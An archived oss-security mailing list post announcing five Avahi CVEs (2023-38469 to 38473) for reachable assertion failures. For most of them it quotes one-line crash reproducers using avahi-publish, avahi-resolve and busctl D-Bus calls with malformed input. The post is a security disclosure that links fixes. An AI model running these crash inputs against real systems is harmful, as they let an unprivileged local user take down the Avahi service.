Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <91be5904-210a-4e21-aa50-e77a41304a1f@oracle.com>
Date: Fri, 6 Oct 2023 14:19:17 -0700
From: Alan Coopersmith <alan.coopersmith@...cle.com>
To: oss-security@...ts.openwall.com
Subject: CVEs assigned for reachable assertions in avahi

While the CVE database still shows them as reserved, Red Hat's & Debian's
trackers show several CVE's being assigned for client requests that can
cause the Avahi server to abort with an assertion failure.  Only one of
them has a fix available so far.

----------------------------------------------------------------------------

CVE-2023-38469: https://github.com/lathiat/avahi/issues/455
  Reachable assertion in avahi_dns_packet_append_record

"It can be triggered by unprivileged local users
  (unless disable-user-service-publishing is set to yes explicitly):

  avahi-publish -s T _qotd._tcp 22 $(perl -le 'print "A " x 100000')"

----------------------------------------------------------------------------

CVE-2023-38470: https://github.com/lathiat/avahi/issues/454
  Reachable assertion in avahi_escape_label

"avahi-resolve -n ',.=.}.=.?-.}.=.?.?.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}.??.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}.?.?.?.r.=.=.?.?`.?.?}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}'"

Fix: https://github.com/lathiat/avahi/commit/94cb6489114636940ac683515417990b55b5d66c

----------------------------------------------------------------------------

CVE-2023-38471: https://github.com/lathiat/avahi/issues/453
  Reachable assertion in dbus_set_host_name

"It can be triggered by unprivileged local users unless 1c599d8 is backported.

  busctl call org.freedesktop.Avahi / org.freedesktop.Avahi.Server2 SetHostName "s" 'A\.B'"

----------------------------------------------------------------------------

CVE-2023-38472: https://github.com/lathiat/avahi/issues/452
  Reachable assertion in avahi_rdata_parse

"It can be reproduced by calling something like

   org.freedesktop.Avahi /Client*/EntryGroup* org.freedesktop.Avahi.EntryGroup AddRecord "iiusqquay" 0 0 0 '' 0 0 0 0

  using

   avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Test", 0x01, 0x10, 120, "", 0)

  from inside a client creating EntryGroups. It can be triggered by unprivileged
  users unless disable-user-service-publishing is set to yes explicitly.
  By default it's set to no."

----------------------------------------------------------------------------

CVE-2023-38473: https://github.com/lathiat/avahi/issues/451
   Reachable assertion in avahi_alternative_host_name

"busctl call org.freedesktop.Avahi / org.freedesktop.Avahi.Server GetAlternativeHostName "s" ').'"

-- 
         -Alan Coopersmith-                 alan.coopersmith@...cle.com
          Oracle Solaris Engineering - https://blogs.oracle.com/solaris

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.